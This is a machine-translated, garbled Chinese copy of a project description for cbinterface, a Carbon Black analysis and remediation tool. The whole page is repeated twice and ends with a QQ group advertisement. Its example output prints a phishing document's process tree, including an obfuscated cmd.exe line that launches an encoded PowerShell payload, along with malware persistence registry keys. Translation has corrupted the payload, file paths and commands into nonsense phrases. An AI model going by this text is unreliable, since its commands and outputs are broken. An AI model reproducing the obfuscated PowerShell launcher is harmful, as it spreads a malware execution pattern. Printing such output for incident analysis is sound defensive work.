用于与多个炭黑环境交互以执行分析和实时响应功能的命令行工具
c-cbinterface的Python项目详细描述
#cbinterface
cbinterface是一个命令行工具,用于与多个炭黑环境交互以执行分析和实时响应功能。
bd8c4ffb542896
.exe
进程PID:4480
命令行:"d:\.exe"
父名称:explorer.exe
主机名:win7 blahhost
开始时间:2017-07-27 15:17:42.009000
图形用户界面链接:https://cbserver.prod.acmecorp.com/analyze/0000034c-0000-1180-01d3-06eb7d86e9fb/
-
进程guid:0000034c-0000-2120-01d3-06eb5dd25140
p进程名:dw20.exe
进程PID:8480
命令行:dw20.exe-x-s 664
父名称:.exe
主机名:win7 blahhost
开始时间:2017-07-27 15:16:51.325000
gui链接:https://cbserver.prod.acmecorp.com/analyze/0000034c-0000-2120-01d3-06eb5dd25140/1501168673628
---
进程guid:0000034c-0000-1614-01d3-06eb5f812a21
进程名称:.exe
进程PID:5652
命令行:"d:"\.exe"
父名称:explorer.exe
主机名:win7 blahhost
开始时间:2017-07-27 15:16:48.502000
gui链接:https://cbserver.prod.acmecorp.com/analyze/0000034c-0000-1614-01d3-06eb5f812a21/1501168673628
环境..
0查询返回的进程段,
```
--——
进程guid:0000001c-0000-0fd0-01d4-3943033fdf40
进程名称:winword.exe
进程pid:4048
进程md5:bf948019509b5b5bf3f9b6ceed2e2b8e3
命令行:"c:\程序文件\microsoft office\office14\winword.exe""C:\发票确认0o59758.doc"
父名称:outlook.exe
主机名:win pc balh
用户名:sandcorp\sandman
开始时间:2018-08-21 07:35:08.069000-0400
gui链接:https://sandbox.local/analyze/0000001C-0000-0FD0-01D4-3943033FDF40/1534853413801
```
流程分析
\WINWORD.EXE" /n "C:\Invoice Confirmation 0O59758.doc" (PID=4048)
"C:\Windows\System32\cmd.exe" /v^:/r " S^ET^ ^0^K^J^=p^ower[h^ell^ ^-e^ ^JA2C^A^FQA^T^w^A^9^A^G^4AZQ^2^3AC0Ab^w2@AG^o^A^ZQ2j^A^HQA+^A^2OA^G,AdA^A)^AFc^A^Z^Q2^@A/^M^Ab^A^2^p^AG^,A^b^g20AD[A^JA^2^:A^F]Ab^A^A^9^ACc^A^a^A2^0^A总部^ACAA^6ACUA^L^W^2QA^H^,^AC^W20^A^G^,^AD^G2V^AGW^ADG^2LAHCA^A^Q^20AGG^A^ZW^2Y^AG/A]^W^2^L^AC^4^A]W^2vAG^0^A^L^w^2^P^A/^u^Acw2w^A/AAaA^20A^HQAcAA^6AC^uALw^2^%A^Gu^A^ZA2h^AC^4^AbQ2h^AG[^Ae^Q2h^A^Go^AcA^2^lAH^+Aa^Q2zAG^k^ALg2j^AG^uAb^Q^AvAG^4^Aag2^AA^G^gA^dA^20^AHAAOgAv^AC^u^A^bQ^2^h^AG^kA^b^A^A)^A^D/A^M^g2n^A^H^+^A^]Q^2@AC^4A^]w2vAG0A^Lw2J^A/AAa^A2^0^A&QAc^A^A6AC^u^ALw^2^%^AH^,Aa^g2lAH^+^AcA^2^yA^G^u^A^ZA2^1A^G^MAd^A^2p^AH^]A]^Q^2^y^A^G/A^ZA2^pA^GuAL^g^2^q^A^G/^A]^w2x^A^H^,AZ^Q^2^[^AGkA^b^g2^lA^Ho^Ab^w^2^y^A^H+AaQ2^[A^G^wA^]^Q^A)^A^G^M^A^b^w^2^%ACu^AV^w^2^A^A^G^gAd^A20AHAA^OgAvACuA^ZA^2^l^A^G^w^A^aQ2^%A^G/Acg^2hAC4A]^w^2vAC^4Ae^g^2h^ACu^Ad^A^A^z^Ac^A^L^g^2T^AH^A^Ab^A^2pAH^QA\A^AnA/^A^AJ^w^ApA^D^[^AJA2pAF^]^AW^QAgA^D0^A^+^AAn^A^D^]^ANw^AzACc^AOwA^k^A^F,^AcA2^@^AD0A^JA2l^A^G^4AdgA6^A^HA^公元^Q^2^@A^GW^AAQ^2^JAC[^A^JW^2CACCA\WA^KA^G^KAV^G^2Z^AC[^AJW^A)A^G,^AEA2LACCA^O^W^2:^G^G^UACG2L^A^G/A]^W^2OAC^G^JA^2IAFA^ADQAG^AGK^AB^G^A^GACQAZG2WAG^WA^\Q^2^7AH^Q^AC^G2^?AH^[AJA2C^AFQA^TwA)A/^QA^bw23^A^G4A^b^A^2v^AG/AZA2^G^A^Gk^Ab^A^2l^ACgA^JA2^I^AFoA^dQ^A^[AC^A^A^JA^2V^A^HAA^]gA^p^AD^[^AS^Q^2)^AH^]^A^bw^2r^AG,^A^L^Q^2^J^AH^Q^A^Z^Q2^%^AC^AAJA^2VA^HA^A^]g^A^7^AG+Acg^2l^AG/A^a^wA7^A^H^0^A]w^2hAHQ^A]w2^o^A^H^[^A^f^Q29AC^AA^+^A^A^gAC^AA^+A^A^gACA^A+A^A^g^ACAA^+AAgACAA+^AA^gAC^AA+^AA^=& sET ^ ^F^DY^M=!W-W-W-W-W-什么?五!只是时间问题。F^D^Y^M:^2^=B^!只是时间问题。我很抱歉。这是正确的。我很抱歉。只是时间问题。嗯!我不知道你在说什么。真不敢相信!只是…我很抱歉。这不是问题。Q~I:[S~!没关系。我不知道。没事,没事。我很抱歉。只是时间问题。我不知道。我不知道。W-W-B-L-L-L-L-L-L-L-L-L-L-L-L-L-L-L-L-L-L-L-L-L只是时间问题。W^D^P^+=I^!只是时间问题。我很抱歉。&;C^L%G^98%"(PID=1736)
电地狱-E JabacaffaTwa9AZQQB3AZ4AZQB3AC0ABWBIAGQQQQQQQQQQQQQQQQbababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababacaaaaaaaaaaaaaaaaaaaaaaaaaaaa8AlWBgagababababababababababagbjag8abqavag4aagbbaggadab0ahaa公路GbagaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGa瓦扎科瓦卡夫阿卡比亚德阿贾布拉格布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加阿加亚加亚加亚加亚加亚加亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚gacaaaaaaaa=(PID=2464)
+winword.exe(PID:4048)-0000001C-0000-0FD0-01D4-3943033FDF40
==filemods=========
2018-08-21 07:35:11.073000-0400:firstwr写:C:\users\sandman\appdata\local\temp\cvr1d81.tmp.cvr
2018-08-21 07:35:11.073000-0400:删除:C:\users\sandman\appdata\appdata\local\temp\temp\cvcvdata-01D0-01D4-01D4-31D4-3943033FD40
2018-08-21 07:35:11.454000-0400:firstwrited:c:\analysis\0\bin\~$normal.dotm.3279569956
2018-08-21 07:35:11.504000-0400:firstwrited:c:\users\sandman\appdata\local\microsoft\windows\temporary internet files\content.word\~wrs{30bdd0a0-5905-40ad-9ed4-tmp
2018-08-21-08-21 07:35:11.504000-0400:11.504000000-0400:firstwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrs{30bdd0a0-5905-5905-40ad-9ed4-f1591f3813f386666a9}.tmp.1554814961
2018-08-21 07:08-21 07:35:51.694000-0400:firstwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrs.1554848149961
2018-08-08-21-08-21-21-07:35:18:2018-08-08-21:51.694000 0\bin\~$语音确认0o59758.doc.164820488
2018-08-21 07:35:52.465000-0400:firstwrite:c:users sandman appdata漫游Microsoft Office最近的发票确认059758.lnk
2018-08-21 07:35:52.556000-0400:deleted:C:\users\sandman\appdata\roaming\microsoft\office\recent\invoice confirmation 0o59758.lnk
2018-08-21 07:35:52.586000-0400:firstwrite:c:\ analysis\0\bin\index.dat.3329669335
+cmd.exe(pid:1736)-0000001c-0000-06c8-01d4-39431dd7d4b0
==filemods=====
+powershell.exe(pid:2464)-0000001c-0000-09a01d4-39431e4a6fc0
==filemods=====
2018-08-21 07:36:05.650000-0400:firstwrited:C:\users\sandman\appdata\roaming\microsoft\windows\recent\customdestinations\gik7dvs0hbwl83m8rt5u.temp
2018-08-21 07:36:05.650000-0400:firstwrited:C:\analysis\0\bin\gik7dvs0hbwl83m8rt5u.temp.3088633466
2018-08-21 07:36:05.650000-0400:firstwrited:C:\users\sandman\appdata\roaming\microsoft\windows\recent\customdestinations\d93f411851d7c929.customdestinations MS
2018-08-21 07:36:05.650000-0400:deleted:C:\users\sandman\appdata\roaming\microsoft\windows\recent\customdestinations\gik7dvs0hbwl83m8rt5u.temp
```
启动
使用Acme环境。
lr会话于2018年1月3日星期三13:38:30开始
hklm\software\microsoft\windows\currentversion\run\badness
--------
名称:badness
类型:reg_sz
数据:"c:\用户\sandman\appdata\roaming\asdf3j\badness.exe"
2018年1月3日星期三13:38:31…完成。
++.exe
[目录]
directory1=c:\users\fakeuser\desktop\nanocore
[pids]
pid1=10856
[注册表路径]
reg1=hklm\software\microsoft\windows\currentversion\run\calc
reg2=hklm\software\microsoft\windows\currentversion\run\hippo
$cbinterface remediate<;sensor hostname>;-f remediate.ini
2017年10月9日星期一16:43:58…正在使用Acme环境启动
。
正在修正<;传感器主机名>;。
找到:c:\程序文件(x86)\记事本++\notepad++.exe,PID:2788
找到:c:\ windows\system32\cmd.exe,PID:7212
+已成功终止PID:10856
+已成功终止PID:2788
+成功杀死PID:7212
+删除C:\users\fakeuser\desktop\testfile.txt
+删除hklm\software\microsoft\windows\currentversion\run\calc
+删除hklm\software\microsoft\windows\currentversion\run\hippo
+删除C:\users\fakeuser\desktop\nanocore
10月9日16:44:02 2017年10月9日星期一16:44:02……完成。
`` bash
`` pip安装cbapi
`````
` ` ` ` `
` ` ` ` ` ` ` bash
`` pip安装cbinterface
` ` `
` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` `cbiterface绑定到默认配置上cbapi使用的文件(请参见[此处](https://github.com/carbonblack/cbapi python api token))。
如果您有多个炭黑环境,则应在凭据中命名节。响应配置有意义。此外,cbiterface目前在炭黑响应配置文件中查找两个自定义字段。首先,`` envType```,它指定炭黑环境的类型。默认情况下,**cbinterface只返回结果或附加到``envtype``设置为'production'的环境**。否则,必须使用"-e`用于指定要使用的环境的标志。下面是一个凭据示例。响应文件:
[沙盒]
url=https://sandbox.local
token=abcdef0123456789abcdef
ssl\u verify=false
envtype=sandbox
[acme]
url=https://cbserver.prod.acmecorp.com
token=aaaaaa
ssl\u verify=true
ignore_system_proxy=true
envtype=production
[othercomp]
url=https://cb.othercomp.com
token=bbbbbb
ssl_verify=true
envtype=production
cbinterface是一个命令行工具,用于与多个炭黑环境交互以执行分析和实时响应功能。
bd8c4ffb542896
.exe
进程PID:4480
命令行:"d:\.exe"
父名称:explorer.exe
主机名:win7 blahhost
开始时间:2017-07-27 15:17:42.009000
图形用户界面链接:https://cbserver.prod.acmecorp.com/analyze/0000034c-0000-1180-01d3-06eb7d86e9fb/
-
进程guid:0000034c-0000-2120-01d3-06eb5dd25140
p进程名:dw20.exe
进程PID:8480
命令行:dw20.exe-x-s 664
父名称:.exe
主机名:win7 blahhost
开始时间:2017-07-27 15:16:51.325000
gui链接:https://cbserver.prod.acmecorp.com/analyze/0000034c-0000-2120-01d3-06eb5dd25140/1501168673628
---
进程guid:0000034c-0000-1614-01d3-06eb5f812a21
进程名称:.exe
进程PID:5652
命令行:"d:"\.exe"
父名称:explorer.exe
主机名:win7 blahhost
开始时间:2017-07-27 15:16:48.502000
gui链接:https://cbserver.prod.acmecorp.com/analyze/0000034c-0000-1614-01d3-06eb5f812a21/1501168673628
环境..
0查询返回的进程段,
```
--——
进程guid:0000001c-0000-0fd0-01d4-3943033fdf40
进程名称:winword.exe
进程pid:4048
进程md5:bf948019509b5b5bf3f9b6ceed2e2b8e3
命令行:"c:\程序文件\microsoft office\office14\winword.exe""C:\发票确认0o59758.doc"
父名称:outlook.exe
主机名:win pc balh
用户名:sandcorp\sandman
开始时间:2018-08-21 07:35:08.069000-0400
gui链接:https://sandbox.local/analyze/0000001C-0000-0FD0-01D4-3943033FDF40/1534853413801
```
流程分析
\WINWORD.EXE" /n "C:\Invoice Confirmation 0O59758.doc" (PID=4048)
"C:\Windows\System32\cmd.exe" /v^:/r " S^ET^ ^0^K^J^=p^ower[h^ell^ ^-e^ ^JA2C^A^FQA^T^w^A^9^A^G^4AZQ^2^3AC0Ab^w2@AG^o^A^ZQ2j^A^HQA+^A^2OA^G,AdA^A)^AFc^A^Z^Q2^@A/^M^Ab^A^2^p^AG^,A^b^g20AD[A^JA^2^:A^F]Ab^A^A^9^ACc^A^a^A2^0^A总部^ACAA^6ACUA^L^W^2QA^H^,^AC^W20^A^G^,^AD^G2V^AGW^ADG^2LAHCA^A^Q^20AGG^A^ZW^2Y^AG/A]^W^2^L^AC^4^A]W^2vAG^0^A^L^w^2^P^A/^u^Acw2w^A/AAaA^20A^HQAcAA^6AC^uALw^2^%A^Gu^A^ZA2h^AC^4^AbQ2h^AG[^Ae^Q2h^A^Go^AcA^2^lAH^+Aa^Q2zAG^k^ALg2j^AG^uAb^Q^AvAG^4^Aag2^AA^G^gA^dA^20^AHAAOgAv^AC^u^A^bQ^2^h^AG^kA^b^A^A)^A^D/A^M^g2n^A^H^+^A^]Q^2@AC^4A^]w2vAG0A^Lw2J^A/AAa^A2^0^A&QAc^A^A6AC^u^ALw^2^%^AH^,Aa^g2lAH^+^AcA^2^yA^G^u^A^ZA2^1A^G^MAd^A^2p^AH^]A]^Q^2^y^A^G/A^ZA2^pA^GuAL^g^2^q^A^G/^A]^w2x^A^H^,AZ^Q^2^[^AGkA^b^g2^lA^Ho^Ab^w^2^y^A^H+AaQ2^[A^G^wA^]^Q^A)^A^G^M^A^b^w^2^%ACu^AV^w^2^A^A^G^gAd^A20AHAA^OgAvACuA^ZA^2^l^A^G^w^A^aQ2^%A^G/Acg^2hAC4A]^w^2vAC^4Ae^g^2h^ACu^Ad^A^A^z^Ac^A^L^g^2T^AH^A^Ab^A^2pAH^QA\A^AnA/^A^AJ^w^ApA^D^[^AJA2pAF^]^AW^QAgA^D0^A^+^AAn^A^D^]^ANw^AzACc^AOwA^k^A^F,^AcA2^@^AD0A^JA2l^A^G^4AdgA6^A^HA^公元^Q^2^@A^GW^AAQ^2^JAC[^A^JW^2CACCA\WA^KA^G^KAV^G^2Z^AC[^AJW^A)A^G,^AEA2LACCA^O^W^2:^G^G^UACG2L^A^G/A]^W^2OAC^G^JA^2IAFA^ADQAG^AGK^AB^G^A^GACQAZG2WAG^WA^\Q^2^7AH^Q^AC^G2^?AH^[AJA2C^AFQA^TwA)A/^QA^bw23^A^G4A^b^A^2v^AG/AZA2^G^A^Gk^Ab^A^2l^ACgA^JA2^I^AFoA^dQ^A^[AC^A^A^JA^2V^A^HAA^]gA^p^AD^[^AS^Q^2)^AH^]^A^bw^2r^AG,^A^L^Q^2^J^AH^Q^A^Z^Q2^%^AC^AAJA^2VA^HA^A^]g^A^7^AG+Acg^2l^AG/A^a^wA7^A^H^0^A]w^2hAHQ^A]w2^o^A^H^[^A^f^Q29AC^AA^+^A^A^gAC^AA^+A^A^gACA^A+A^A^g^ACAA^+AAgACAA+^AA^gAC^AA+^AA^=& sET ^ ^F^DY^M=!W-W-W-W-W-什么?五!只是时间问题。F^D^Y^M:^2^=B^!只是时间问题。我很抱歉。这是正确的。我很抱歉。只是时间问题。嗯!我不知道你在说什么。真不敢相信!只是…我很抱歉。这不是问题。Q~I:[S~!没关系。我不知道。没事,没事。我很抱歉。只是时间问题。我不知道。我不知道。W-W-B-L-L-L-L-L-L-L-L-L-L-L-L-L-L-L-L-L-L-L-L-L只是时间问题。W^D^P^+=I^!只是时间问题。我很抱歉。&;C^L%G^98%"(PID=1736)
电地狱-E JabacaffaTwa9AZQQB3AZ4AZQB3AC0ABWBIAGQQQQQQQQQQQQQQQQbababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababababacaaaaaaaaaaaaaaaaaaaaaaaaaaaa8AlWBgagababababababababababagbjag8abqavag4aagbbaggadab0ahaa公路GbagaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGaGa瓦扎科瓦卡夫阿卡比亚德阿贾布拉格布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加布加阿加亚加亚加亚加亚加亚加亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚亚gacaaaaaaaa=(PID=2464)
+winword.exe(PID:4048)-0000001C-0000-0FD0-01D4-3943033FDF40
==filemods=========
2018-08-21 07:35:11.073000-0400:firstwr写:C:\users\sandman\appdata\local\temp\cvr1d81.tmp.cvr
2018-08-21 07:35:11.073000-0400:删除:C:\users\sandman\appdata\appdata\local\temp\temp\cvcvdata-01D0-01D4-01D4-31D4-3943033FD40
2018-08-21 07:35:11.454000-0400:firstwrited:c:\analysis\0\bin\~$normal.dotm.3279569956
2018-08-21 07:35:11.504000-0400:firstwrited:c:\users\sandman\appdata\local\microsoft\windows\temporary internet files\content.word\~wrs{30bdd0a0-5905-40ad-9ed4-tmp
2018-08-21-08-21 07:35:11.504000-0400:11.504000000-0400:firstwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrs{30bdd0a0-5905-5905-40ad-9ed4-f1591f3813f386666a9}.tmp.1554814961
2018-08-21 07:08-21 07:35:51.694000-0400:firstwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrwrs.1554848149961
2018-08-08-21-08-21-21-07:35:18:2018-08-08-21:51.694000 0\bin\~$语音确认0o59758.doc.164820488
2018-08-21 07:35:52.465000-0400:firstwrite:c:users sandman appdata漫游Microsoft Office最近的发票确认059758.lnk
2018-08-21 07:35:52.556000-0400:deleted:C:\users\sandman\appdata\roaming\microsoft\office\recent\invoice confirmation 0o59758.lnk
2018-08-21 07:35:52.586000-0400:firstwrite:c:\ analysis\0\bin\index.dat.3329669335
+cmd.exe(pid:1736)-0000001c-0000-06c8-01d4-39431dd7d4b0
==filemods=====
+powershell.exe(pid:2464)-0000001c-0000-09a01d4-39431e4a6fc0
==filemods=====
2018-08-21 07:36:05.650000-0400:firstwrited:C:\users\sandman\appdata\roaming\microsoft\windows\recent\customdestinations\gik7dvs0hbwl83m8rt5u.temp
2018-08-21 07:36:05.650000-0400:firstwrited:C:\analysis\0\bin\gik7dvs0hbwl83m8rt5u.temp.3088633466
2018-08-21 07:36:05.650000-0400:firstwrited:C:\users\sandman\appdata\roaming\microsoft\windows\recent\customdestinations\d93f411851d7c929.customdestinations MS
2018-08-21 07:36:05.650000-0400:deleted:C:\users\sandman\appdata\roaming\microsoft\windows\recent\customdestinations\gik7dvs0hbwl83m8rt5u.temp
```
启动
使用Acme环境。
lr会话于2018年1月3日星期三13:38:30开始
hklm\software\microsoft\windows\currentversion\run\badness
--------
名称:badness
类型:reg_sz
数据:"c:\用户\sandman\appdata\roaming\asdf3j\badness.exe"
2018年1月3日星期三13:38:31…完成。
++.exe
[目录]
directory1=c:\users\fakeuser\desktop\nanocore
[pids]
pid1=10856
[注册表路径]
reg1=hklm\software\microsoft\windows\currentversion\run\calc
reg2=hklm\software\microsoft\windows\currentversion\run\hippo
$cbinterface remediate<;sensor hostname>;-f remediate.ini
2017年10月9日星期一16:43:58…正在使用Acme环境启动
。
正在修正<;传感器主机名>;。
找到:c:\程序文件(x86)\记事本++\notepad++.exe,PID:2788
找到:c:\ windows\system32\cmd.exe,PID:7212
+已成功终止PID:10856
+已成功终止PID:2788
+成功杀死PID:7212
+删除C:\users\fakeuser\desktop\testfile.txt
+删除hklm\software\microsoft\windows\currentversion\run\calc
+删除hklm\software\microsoft\windows\currentversion\run\hippo
+删除C:\users\fakeuser\desktop\nanocore
10月9日16:44:02 2017年10月9日星期一16:44:02……完成。
`` bash
`` pip安装cbapi
`````
` ` ` ` `
` ` ` ` ` ` ` bash
`` pip安装cbinterface
` ` `
` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` ` `cbiterface绑定到默认配置上cbapi使用的文件(请参见[此处](https://github.com/carbonblack/cbapi python api token))。
如果您有多个炭黑环境,则应在凭据中命名节。响应配置有意义。此外,cbiterface目前在炭黑响应配置文件中查找两个自定义字段。首先,`` envType```,它指定炭黑环境的类型。默认情况下,**cbinterface只返回结果或附加到``envtype``设置为'production'的环境**。否则,必须使用"-e`用于指定要使用的环境的标志。下面是一个凭据示例。响应文件:
[沙盒]
url=https://sandbox.local
token=abcdef0123456789abcdef
ssl\u verify=false
envtype=sandbox
[acme]
url=https://cbserver.prod.acmecorp.com
token=aaaaaa
ssl\u verify=true
ignore_system_proxy=true
envtype=production
[othercomp]
url=https://cb.othercomp.com
token=bbbbbb
ssl_verify=true
envtype=production
欢迎加入QQ群-->: 979659372
